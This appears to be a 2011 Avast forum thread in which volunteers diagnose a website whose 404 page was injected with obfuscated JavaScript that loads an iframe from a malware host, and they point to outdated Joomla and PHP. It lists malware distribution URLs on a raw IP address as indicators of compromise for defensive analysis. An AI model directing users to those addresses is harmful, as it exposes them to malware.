Author Topic: JS:ScriptUE in hxxp://www.erlotelebista.com  (Read 3816 times)

0 Members and 1 Guest are viewing this topic.

acv

  • Guest
JS:ScriptUE in hxxp://www.erlotelebista.com
« on: June 13, 2011, 06:19:09 PM »
Hello,
our site hxxp://www.erlotelebista.com/

the Avast is still showing it as containing a URL:Mal , is it a blacklist of Avast?

Not other Antivirus are detecting anything now. Also this is proof of the lack of any infection right now.

Thanks in advance.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89438
  • No support PMs thanks
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #1 on: June 13, 2011, 07:38:00 PM »
Your site appears to have been hacked there is no favicon or hacked favicon.ico file and there is a call for that which generates a 404 error page which has most certainly hacked, http://www.virustotal.com/file-scan/report.html?id=df15fc444d130b29c31f1a48d382f3f2072b84668b4d5976deb98aef8e82cdd3-1307985672.

Other image files also appear to have been hacked.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.6.6121 (build 24.6.9241.848) UI 1.0.809/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33983
  • malware fighter
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #2 on: June 13, 2011, 10:31:36 PM »
Hi acx,

Those that visit the site will get a avast Web Shield warning for JS:ScriptUE-inf[Trj] in -htxp://etc...... logo.png
The site was hacked via a vulnerability, web admins should check theirr PHP and Joomla website application software for updates:
parts of the code could be still in Joomla 1.5.18 and not 1.5.21

PHP version is PHP/5.1.6, version open to some recent by-pass vulnerabilities, 3 known to sofware developer,

polonus

P.S. Code attached could be replaced to make the webpage more IE friendly...
this because the site runs Apache...
see: http://wepawet.iseclab.org/view.php?hash=e1667a2bc5725a999462548a2981bb71&t=1307997764&type=js

D
« Last Edit: June 13, 2011, 10:56:59 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

spg SCOTT

  • Guest
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #3 on: June 13, 2011, 10:54:40 PM »
Just for more information, the script that David has pointed out, contained in the hacked 404 page, deobfuscates to an iframe, pointing to a site that is known for malware:

http://hosts-file.net/?s=213.182.197.42&view=matches

Interesting to note, the difference in detection at VT:
http://www.virustotal.com/file-scan/report.html?id=7ecef262a30618ec1b38b9b56931f35a059b9b0591b342a5f208fd75185394a3-1307997688
This is the iframe in my image as it is in a text file.
Seems detection is better on the obfuscation than the content?

(Though I imagine that VT overlooks some elements of the scanning...)

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33983
  • malware fighter
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #4 on: June 13, 2011, 11:11:24 PM »
Hi spg SCOTT,

Thank you for that additional information but most of the malware that resided there with no response now, so dead, it had two unknown executables and an some EXP/Pidief.W malware.
in resp.

-http://213.182.197.42/swf.php,
-http://213.182.197.42/load.php,
-http://213.182.197.42/pdf.php

also see: http://www.spamhaus.org/sbl/sbl.lasso?query=SBL75831

polonus







« Last Edit: June 13, 2011, 11:42:10 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

acv

  • Guest
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #5 on: June 14, 2011, 05:29:30 PM »
Hello,

How can I find where is the malware?

Thanks a lot

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89438
  • No support PMs thanks
Re: JS:ScriptUE in hxxp://www.erlotelebista.com
« Reply #6 on: June 14, 2011, 06:04:24 PM »
Click the images to expand they will show some of the images, etc. that I had alerts on.

The fact that they appear to have the same insertion point, failed loading of those images resulting in the 404 error page which has been hacked with the insertion of an obfuscated javascript document.write above the opening <head> tag.

- See http://www.scmagazineus.com/Every-36-seconds-a-website-is-infected/article/140414/.
- Also see, Help: I Got Hacked. Now What Do I Do? http://technet.microsoft.com/de-de/library/cc512587%28en-us%29.aspx.
- Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.6.6121 (build 24.6.9241.848) UI 1.0.809/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security